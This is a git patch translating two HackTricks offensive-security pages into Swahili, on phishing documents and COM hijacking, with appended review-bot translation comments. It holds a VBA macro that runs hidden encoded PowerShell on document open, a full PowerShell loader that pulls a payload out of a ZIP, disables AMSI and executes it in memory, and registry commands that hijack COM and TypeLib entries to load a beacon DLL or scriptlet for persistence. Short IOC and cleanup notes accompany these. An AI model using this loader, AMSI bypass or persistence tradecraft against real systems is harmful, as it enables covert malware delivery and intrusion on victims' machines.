From d1109cd1ee3860dcfc754664c340555918ab437e Mon Sep 17 00:00:00 2001 From: Translator Date: Thu, 28 Aug 2025 22:49:47 +0000 Subject: [PATCH] Translated ['src/generic-methodologies-and-resources/phishing-methodolog --- .../phishing-documents.md | 109 +++++++++++++----- .../com-hijacking.md | 72 ++++++++++-- 2 files changed, 145 insertions(+), 36 deletions(-) diff --git a/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md b/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md index c5ce42351..60594d8fb 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md 
@@ -1,40 +1,40 @@ -# Phishing Files & Documents +# Faili na Nyaraka za Phishing {{#include ../../banners/hacktricks-training.md}} -## Office Documents +## Nyaraka za Office -Microsoft Word hufanya uthibitisho wa data za faili kabla ya kufungua faili. Uthibitisho wa data unafanywa kwa njia ya utambuzi wa muundo wa data, dhidi ya kiwango cha OfficeOpenXML. Ikiwa hitilafu yoyote itatokea wakati wa utambuzi wa muundo wa data, faili inayochambuliwa haitafunguliwa. +Microsoft Word hufanya uhakiki wa data za faili kabla ya kufungua faili. Uhakiki wa data hufanywa kwa njia ya utambuzi wa muundo wa data, kwa mujibu wa kiwango cha OfficeOpenXML. Ikiwa kosa lolote litatokea wakati wa utambuzi wa muundo wa data, faili inayochunguzwa haitafunguliwa. -Kwa kawaida, faili za Word zinazokuwa na macros hutumia kiambishi cha `.docm`. Hata hivyo, inawezekana kubadilisha jina la faili kwa kubadilisha kiambishi cha faili na bado kuhifadhi uwezo wao wa kutekeleza macros.\ -Kwa mfano, faili ya RTF haisaidii macros, kwa muundo, lakini faili ya DOCM iliyobadilishwa kuwa RTF itashughulikiwa na Microsoft Word na itakuwa na uwezo wa kutekeleza macros.\ -Mifumo na mitambo sawa inatumika kwa programu zote za Microsoft Office Suite (Excel, PowerPoint n.k.). +Kwa kawaida, faili za Word zinazobeba macros hutumia extension ya `.docm`. Hata hivyo, inawezekana kubadilisha jina la faili kwa kubadilisha extension ya faili na bado kuhifadhi uwezo wake wa kutekeleza macros.\ +Kwa mfano, faili ya RTF haiungi mkono macros, kwa muundo, lakini faili ya DOCM iliyobadilishwa jina kuwa RTF itashughulikiwa na Microsoft Word na itakuwa na uwezo wa kutekeleza macros.\ +Mifumo ya ndani na taratibu sawa zinatumika kwa programu zote za Microsoft Office Suite (Excel, PowerPoint n.k.). 
-Unaweza kutumia amri ifuatayo kuangalia ni kiambishi gani kitakachotekelezwa na baadhi ya programu za Office: +Unaweza kutumia amri ifuatayo kuangalia ni zipi extensions zitakazotekelezwa na baadhi ya programu za Office: ```bash assoc | findstr /i "word excel powerp" ``` -DOCX faili zinazorejelea templeti ya mbali (File –Options –Add-ins –Manage: Templates –Go) ambayo inajumuisha macros zinaweza "kutekeleza" macros pia. +Faili za DOCX zinazorejelea template ya mbali (File –Options –Add-ins –Manage: Templates –Go) ambazo zinajumuisha macros zinaweza pia “kutekeleza” macros. -### Upakuaji wa Picha za Nje +### Kupakia Picha za Nje Nenda kwa: _Insert --> Quick Parts --> Field_\ -_**Categories**: Links and References, **Filed names**: includePicture, na **Filename or URL**:_ http://\/whatever +_**Categories**: Links and References, **Filed names**: includePicture, and **Filename or URL**:_ http:///whatever ![](<../../images/image (155).png>) -### Backdoor za Macros +### Macros Backdoor -Inawezekana kutumia macros kuendesha msimbo wowote kutoka kwa hati. +Inawezekana kutumia macros kuendesha arbitrary code kutoka kwenye document. -#### Kazi za Autoload +#### Autoload functions -Kadri zinavyokuwa za kawaida, ndivyo uwezekano wa AV kuzitambua unavyoongezeka. +Kadri zinavyokuwa za kawaida zaidi, ndivyo AV inavyoweza kuzitambua. - AutoOpen() - Document_Open() -#### Mifano ya Msimbo wa Macros +#### Macros Code Examples ```vba Sub AutoOpen() CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc 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") 
@@ -64,16 +64,16 @@ Dim proc As Object Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process") proc.Create "powershell ``` -#### Ondoa metadata kwa mikono +#### Ondoa metadata kwa mkono -Nenda kwenye **File > Info > Inspect Document > Inspect Document**, ambayo itafungua Document Inspector. Bonyeza **Inspect** kisha **Remove All** kando ya **Document Properties and Personal Information**. +Nenda kwa **File > Info > Inspect Document > Inspect Document**, ambayo itafungua Document Inspector. Bonyeza **Inspect** kisha **Remove All** kando ya **Document Properties and Personal Information**. -#### Upanuzi wa Doc +#### Extension ya Doc -Unapomaliza, chagua **Save as type** dropdown, badilisha muundo kutoka **`.docx`** hadi **Word 97-2003 `.doc`**.\ -Fanya hivi kwa sababu huwezi **kuhifadhi macro ndani ya `.docx`** na kuna **stigma** **kuhusu** upanuzi wa macro-enabled **`.docm`** (kwa mfano, ikoni ya thumbnail ina `!` kubwa na baadhi ya lango la wavuti/barua pepe linaweza kuzuia kabisa). Hivyo, upanuzi huu wa zamani wa `.doc` ni **mkataba bora**. +Ukimaliza, chagua dropdown ya **Save as type**, badilisha muundo kutoka **`.docx`** hadi **Word 97-2003 `.doc`**.\ +Fanya hivyo kwa sababu **huwezi kuhifadhi macro's ndani ya `.docx`** na kuna **stigma** kuhusu ugani unaowezesha macro **`.docm`** (kwa mfano, icon ya thumbnail ina `!` kubwa na baadhi ya gateway za wavuti/baruapepe huvizuia kabisa). Kwa hiyo, **ugani wa kale `.doc` ndio suluhisho bora**. -#### Watengenezaji wa Macros Mbaya +#### Vyanzo vya Malicious Macros - MacOS - [**macphish**](https://github.com/cldrn/macphish) 
@@ -81,9 +81,9 @@ Fanya hivi kwa sababu huwezi **kuhifadhi macro ndani ya `.docx`** na kuna **stig ## Faili za HTA -HTA ni programu ya Windows ambayo **inaunganisha HTML na lugha za skripti (kama VBScript na JScript)**. Inaunda kiolesura cha mtumiaji na inatekelezwa kama programu "iliyokubaliwa kikamilifu", bila vizuizi vya mfano wa usalama wa kivinjari. +HTA ni programu ya Windows inayochanganya **HTML na lugha za scripting (k.m. VBScript na JScript)**. Inaunda kiolesura cha mtumiaji na inaendeshwa kama programu "iliyothibitishwa kabisa", bila vikwazo vya mfano wa usalama wa kivinjari. -HTA inatekelezwa kwa kutumia **`mshta.exe`**, ambayo kwa kawaida **imewekwa** pamoja na **Internet Explorer**, ikifanya **`mshta` kuwa tegemezi kwa IE**. Hivyo ikiwa imeondolewa, HTAs hazitaweza kutekelezwa. +HTA inaenzishwa kwa kutumia **`mshta.exe`**, ambayo kwa kawaida **imesakinishwa** pamoja na **Internet Explorer**, na kufanya **`mshta` inategemea IE**. Kwa hivyo ikiwa imeondolewa, HTA hazitaweza kutekelezwa. ```html <--! Basic HTA Execution --> @@ -138,11 +138,11 @@ var_func self.close ``` -## Kulazimisha Uthibitisho wa NTLM +## Kulazimisha NTLM Authentication -Kuna njia kadhaa za **kulazimisha uthibitisho wa NTLM "kijijini"**, kwa mfano, unaweza kuongeza **picha zisizoonekana** kwenye barua pepe au HTML ambazo mtumiaji atafikia (hata HTTP MitM?). Au tumia mwathirika **anwani ya faili** ambazo zita **anzisha** **uthibitisho** tu kwa **kufungua folda.** +Kuna njia kadhaa za **kulazimisha NTLM authentication "kwa mbali"**, kwa mfano, unaweza kuongeza **picha zisizoonekana** kwenye barua pepe au HTML ambazo mtumiaji atazifungua (hata HTTP MitM?). Au mtumie mwathiriwa **anwani ya faili** zitakazowasababisha **authentication** tu kwa **ufunguaji wa folda.** -**Angalia mawazo haya na mengine kwenye kurasa zifuatazo:** +**Tazama mawazo haya na zaidi kwenye kurasa zifuatazo:** {{#ref}} 
@@ -156,9 +156,60 @@ Kuna njia kadhaa za **kulazimisha uthibitisho wa NTLM "kijijini"**, kwa mfano, u ### NTLM Relay -Usisahau kwamba huwezi tu kuiba hash au uthibitisho bali pia **fanya mashambulizi ya NTLM relay**: +Usisahau kwamba huwezi kuiba tu hash au authentication pekee, bali pia unaweza **perform NTLM relay attacks**: -- [**Mashambulizi ya NTLM Relay**](../pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#ntml-relay-attack) -- [**AD CS ESC8 (NTLM relay kwa vyeti)**](../../windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md#ntlm-relay-to-ad-cs-http-endpoints-esc8) +- [**NTLM Relay attacks**](../pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#ntml-relay-attack) +- [**AD CS ESC8 (NTLM relay to certificates)**](../../windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md#ntlm-relay-to-ad-cs-http-endpoints-esc8) + +## LNK Loaders + ZIP-Embedded Payloads (fileless chain) + +Kampeni zenye ufanisi mkubwa hutuma ZIP inayojumuisha nyaraka mbili halali za kupotosha (PDF/DOCX) na .lnk hatari. Mbinu ni kwamba loader halisi ya PowerShell imehifadhiwa ndani ya bytes ghafi za ZIP baada ya alama ya kipekee, na .lnk huitaibua na kuiendesha kabisa kwenye kumbukumbu. + +Mtiririko wa kawaida unaotekelezwa na .lnk PowerShell one-liner: + +1) Tambua ZIP ya asili katika njia za kawaida: Desktop, Downloads, Documents, %TEMP%, %ProgramData%, na folda mzazi ya current working directory. +2) Soma bytes za ZIP na utafute marker uliowekwa kwenye msimbo (mfano, xFIQCV). Yote yanayofuata marker ni PowerShell payload iliyojazwa ndani. +3) Nakili ZIP hadi %ProgramData%, itolee hapo (extract), kisha fungua .docx ya kupotosha ili ionekane halali. +4) Bypass AMSI kwa process ya sasa: [System.Management.Automation.AmsiUtils]::amsiInitFailed = $true +5) Deobfuscate hatua inayofuata (kwa mfano, ondoa tabia zote za #) na uitekeleze kwenye kumbukumbu. 
+ +Mfano wa skeleton ya PowerShell ili kuibua na kuendesha hatua iliyojazwa ndani: +```powershell +$marker = [Text.Encoding]::ASCII.GetBytes('xFIQCV') +$paths = @( +"$env:USERPROFILE\Desktop", "$env:USERPROFILE\Downloads", "$env:USERPROFILE\Documents", +"$env:TEMP", "$env:ProgramData", (Get-Location).Path, (Get-Item '..').FullName +) +$zip = Get-ChildItem -Path $paths -Filter *.zip -ErrorAction SilentlyContinue -Recurse | Sort-Object LastWriteTime -Descending | Select-Object -First 1 +if(-not $zip){ return } +$bytes = [IO.File]::ReadAllBytes($zip.FullName) +$idx = [System.MemoryExtensions]::IndexOf($bytes, $marker) +if($idx -lt 0){ return } +$stage = $bytes[($idx + $marker.Length) .. ($bytes.Length-1)] +$code = [Text.Encoding]::UTF8.GetString($stage) -replace '#','' +[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) +Invoke-Expression $code +``` +Notes +- Usambazaji mara nyingi unatumia vibamba vya subdomain vya PaaS vinavyoaminika (e.g., *.herokuapp.com) na unaweza gate payloads (kutumia ZIP zisizo hatari kulingana na IP/UA). +- Hatua inayofuata mara nyingi hu-decrypt base64/XOR shellcode na kuiendesha kupitia Reflection.Emit + VirtualAlloc ili kupunguza athari za diski. + +Persistence used in the same chain +- COM TypeLib hijacking of the Microsoft Web Browser control ili IE/Explorer au programu yoyote inayoiingiza ianze upya payload kiotomatiki. See details and ready-to-use commands here: + +{{#ref}} +../../windows-hardening/windows-local-privilege-escalation/com-hijacking.md +{{#endref}} + +Hunting/IOCs +- ZIP files zenye kamba ya alama ya ASCII (e.g., xFIQCV) iliyoongezwa kwenye data ya archive. +- .lnk inayoorodhesha folda za mzazi/mtumiaji ili kupata ZIP na kufungua nyaraka ya kudanganya. +- Kuchezewa kwa AMSI kupitia [System.Management.Automation.AmsiUtils]::amsiInitFailed. 
+- Nyuzi za biashara zinazodumu muda mrefu zikimalizika kwa viungo vinavyoandikwa chini ya vikoa vya PaaS vinavyoaminika. + +## References + +- [Check Point Research – ZipLine Campaign: A Sophisticated Phishing Attack Targeting US Companies](https://research.checkpoint.com/2025/zipline-phishing-campaign/) +- [Hijack the TypeLib – New COM persistence technique (CICADA8)](https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661) {{#include ../../banners/hacktricks-training.md}} diff --git a/src/windows-hardening/windows-local-privilege-escalation/com-hijacking.md b/src/windows-hardening/windows-local-privilege-escalation/com-hijacking.md index a406c4f85..9e4e83919 100644 --- a/src/windows-hardening/windows-local-privilege-escalation/com-hijacking.md +++ b/src/windows-hardening/windows-local-privilege-escalation/com-hijacking.md 
@@ -2,15 +2,15 @@ {{#include ../../banners/hacktricks-training.md}} -### Kutafuta sehemu za COM zisizopo +### Kutafuta vipengele vya COM visivyopo -Kwa kuwa thamani za HKCU zinaweza kubadilishwa na watumiaji, **COM Hijacking** inaweza kutumika kama **mekanismu ya kudumu**. Kwa kutumia `procmon` ni rahisi kupata rejista za COM zilizotafutwa ambazo hazipo ambazo mshambuliaji anaweza kuunda ili kudumu. Filters: +Kama thamani za HKCU zinaweza kubadilishwa na watumiaji, **COM Hijacking** inaweza kutumika kama **mbinu za kudumu**. Kutumia `procmon` ni rahisi kupata rejista za COM zilizoombwa ambazo hazipo na ambazo mshambuliaji anaweza kuziunda ili kudumu. Vichujio: - **RegOpenKey** operations. - ambapo _Result_ ni **NAME NOT FOUND**. - na _Path_ inamalizika na **InprocServer32**. -Mara tu unapokuwa umeamua ni COM ipi isiyopo unayotaka kuiga, tekeleza amri zifuatazo. _Kuwa makini ikiwa unataka kuiga COM inayopakuliwa kila sekunde chache kwani hiyo inaweza kuwa kupita kiasi._ +Mara uamapoamua ni COM gani isiyokuwepo kuigiza, tekeleza amri zifuatazo. _Angalia kwa uangalifu ikiwa utaamua kuiga COM ambayo inapakiwa kila sekunde chache kwani hiyo inaweza kuwa ya kupitiliza._ ```bash New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" New-Item -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" -Name "InprocServer32" -Value "C:\beacon.dll" @@ -18,7 +18,7 @@ New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F ``` ### Hijackable Task Scheduler COM components -Windows Tasks hutumia Custom Triggers kuita COM objects na kwa sababu zinafanywa kupitia Task Scheduler, ni rahisi kutabiri wakati zitakapoitwa. +Windows Tasks zinatumia Custom Triggers kuita COM objects, na kwa sababu zinaendeshwa kupitia Task Scheduler, ni rahisi kutabiri lini zitaanzishwa.
# Show COM CLSIDs
 $Tasks = Get-ScheduledTask
@@ -49,9 +49,9 @@ Write-Host
 # CLSID:  {1936ED8A-BD93-3213-E325-F38D112938E1}
 # [more like the previous one...]
-Kuangalia matokeo unaweza kuchagua moja ambayo itatekelezwa **kila wakati mtumiaji anapoingia** kwa mfano. +Ukikagua matokeo unaweza kuchagua moja ambayo itaendeshwa **kila wakati mtumiaji anapoingia** kwa mfano. -Sasa kutafuta CLSID **{1936ED8A-BD93-3213-E325-F38D112938EF}** katika **HKEY\CLASSES\ROOT\CLSID** na katika HKLM na HKCU, kwa kawaida utaona kwamba thamani hiyo haipo katika HKCU. +Sasa unapochunguza CLSID **{1936ED8A-BD93-3213-E325-F38D112938EF}** katika **HKEY\CLASSES\ROOT\CLSID** na katika HKLM na HKCU, kawaida utagundua kwamba thamani haipo katika HKCU. ```bash # Exists in HKCR\CLSID\ Get-ChildItem -Path "Registry::HKCR\CLSID\{1936ED8A-BD93-3213-E325-F38D112938EF}" 
@@ -72,6 +72,64 @@ Name Property PS C:\> Get-Item -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" Get-Item : Cannot find path 'HKCU:\Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}' because it does not exist. ``` -Kisha, unaweza tu kuunda kiingilio cha HKCU na kila wakati mtumiaji anapoingia, nyuma yako itawashwa. +Kisha, unaweza tu kuunda kiingilio cha HKCU na kila mtumiaji anapoingia, backdoor yako itaanzishwa. + +--- + +## COM TypeLib Hijacking (script: moniker persistence) + +Type Libraries (TypeLib) zinaelezea COM interfaces na zinaingizwa kupitia `LoadTypeLib()`. Wakati COM server inapoanzishwa, OS pia inaweza kuingiza TypeLib inayohusiana kwa kushauriana na funguo za rejista chini ya `HKCR\TypeLib\{LIBID}`. Ikiwa njia ya TypeLib itabadilishwa na **moniker**, mfano `script:C:\...\evil.sct`, Windows itatekeleza scriptlet wakati TypeLib inapogunduliwa — na kusababisha persistence ya kimyakimya inayochochewa wakati vipengele vya kawaida vinapoguswa. + +Hii imeonekana dhidi ya Microsoft Web Browser control (inayoingizwa mara kwa mara na Internet Explorer, programu zinazojumuisha WebBrowser, na hata `explorer.exe`). + +### Hatua (PowerShell) + +1) Tambua TypeLib (LIBID) inayotumiwa na CLSID inayotumika mara kwa mara. Mfano wa CLSID unaotumika mara nyingi na minyororo ya malware: {EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B} (Microsoft Web Browser). 
+```powershell +$clsid = '{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}' +$libid = (Get-ItemProperty -Path "Registry::HKCR\\CLSID\\$clsid\\TypeLib").'(default)' +$ver = (Get-ChildItem "Registry::HKCR\\TypeLib\\$libid" | Select-Object -First 1).PSChildName +"CLSID=$clsid LIBID=$libid VER=$ver" +``` +2) Elekeza njia ya TypeLib ya mtumiaji mmoja kwa scriptlet ya ndani ukitumia moniker `script:` (no admin rights required): +```powershell +$dest = 'C:\\ProgramData\\Udate_Srv.sct' +New-Item -Path "HKCU:Software\\Classes\\TypeLib\\$libid\\$ver\\0\\win32" -Force | Out-Null +Set-ItemProperty -Path "HKCU:Software\\Classes\\TypeLib\\$libid\\$ver\\0\\win32" -Name '(default)' -Value "script:$dest" +``` +3) Drop JScript `.sct` ndogo kabisa inayowasha tena primary payload yako (kwa mfano `.lnk` inayotumiwa na initial chain): +```xml + + + + + +``` +4) Kuchochea – kufungua IE, programu inayojumuisha WebBrowser control, au hata shughuli za kawaida za Explorer zitapakia TypeLib na kutekeleza scriptlet, zikirejesha mnyororo wako wakati wa logon/reboot. + +Usafishaji +```powershell +# Remove the per-user TypeLib hijack +Remove-Item -Recurse -Force "HKCU:Software\\Classes\\TypeLib\\$libid\\$ver" 2>$null +# Delete the dropped scriptlet +Remove-Item -Force 'C:\\ProgramData\\Udate_Srv.sct' 2>$null +``` +Vidokezo +- Unaweza kutumia mantiki ile ile kwa COM components nyingine zinazotumika mara kwa mara; daima pata `LIBID` halisi kutoka `HKCR\CLSID\{CLSID}\TypeLib` kwanza. +- Kwenye mifumo ya 64-bit unaweza pia kujaza subkey ya `win64` kwa watumiaji wa 64-bit. + +## Marejeo + +- [Hijack the TypeLib – New COM persistence technique (CICADA8)](https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661) +- [Check Point Research – ZipLine Campaign: A Sophisticated Phishing Attack Targeting US Companies](https://research.checkpoint.com/2025/zipline-phishing-campaign/) {{#include ../../banners/hacktricks-training.md}}
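Review bot: the Word dialog label in the "Kupakia Picha za Nje" paragraph of the first phishing-documents.md hunk still reads `**Filed names**`; the dialog says "Field names", and since the typo is carried over from the line being replaced, this translation pass is the place to fix it: `_**Categories**: Links and References, **Field names**: includePicture, ...`.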
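Review bot: the "Extension ya Doc" hunk in phishing-documents.md uses `Extension` in the heading and `ugani` twice in the body for the same term, while the first hunk of the file settled on `extension`; pick one for the whole file. In the same paragraph `macro's` should be `macros` (plural, no apostrophe).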
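Review bot: `inaenzishwa` in the `mshta.exe` paragraph of the HTA hunk looks like a typo for `inaendeshwa`; the preceding sentence of the same hunk already uses `inaendeshwa` for exactly this meaning, so the two should agree.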
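Review bot: the new "LNK Loaders + ZIP-Embedded Payloads" section in phishing-documents.md leaves several headings untranslated (`Notes`, `Persistence used in the same chain`, `Hunting/IOCs`, `## References`) while the com-hijacking.md hunk in this same patch renders the equivalent headings as `Vidokezo` and `## Marejeo`; use the same Swahili headings here so the two files match. On the Hunting/IOCs bullet about the ASCII marker: the text above describes the loader as locating data "baada ya alama ya kipekee" appended to the raw ZIP bytes, so it would help defenders to state that `xFIQCV` is campaign-specific and that the general signal is any trailing data after the archive's end-of-central-directory record, not that one string.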
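Review bot: `Mara uamapoamua` in the last prose line of the first com-hijacking.md hunk is garbled; the intended form is `Mara unapoamua`. The opening sentence of the same hunk also turns the original's causal `Kwa kuwa thamani za HKCU zinaweza kubadilishwa` (since HKCU values are user-writable) into a conditional `Kama ...`; keep `Kwa kuwa`, because the sentence is explaining why HKCU entries are usable for persistence, not stating a condition.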
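Review bot: the ```xml block in step 3 of the COM TypeLib hunk is empty (five blank `+` lines), so the scriptlet the step refers to is missing from the rendered page; either restore the block from the source file or drop the fence and the sentence that introduces it. The PowerShell blocks in steps 1 and 2 and in the "Usafishaji" cleanup section also carry doubled backslashes (`Registry::HKCR\\CLSID\\$clsid\\TypeLib`, `HKCU:Software\\Classes\\TypeLib\\$libid\\$ver\\0\\win32`), which look like markdown escaping that leaked into a fenced block: backslash is not an escape character in PowerShell strings, and the earlier hunk in this same file writes the same kind of path as `HKCU:Software\Classes\CLSID`. The cleanup block matters most here, since it is what a responder would run to remove the hijack, so its paths should be written the way the rest of the file writes them. Step 2 additionally leaves `(no admin rights required)` untranslated.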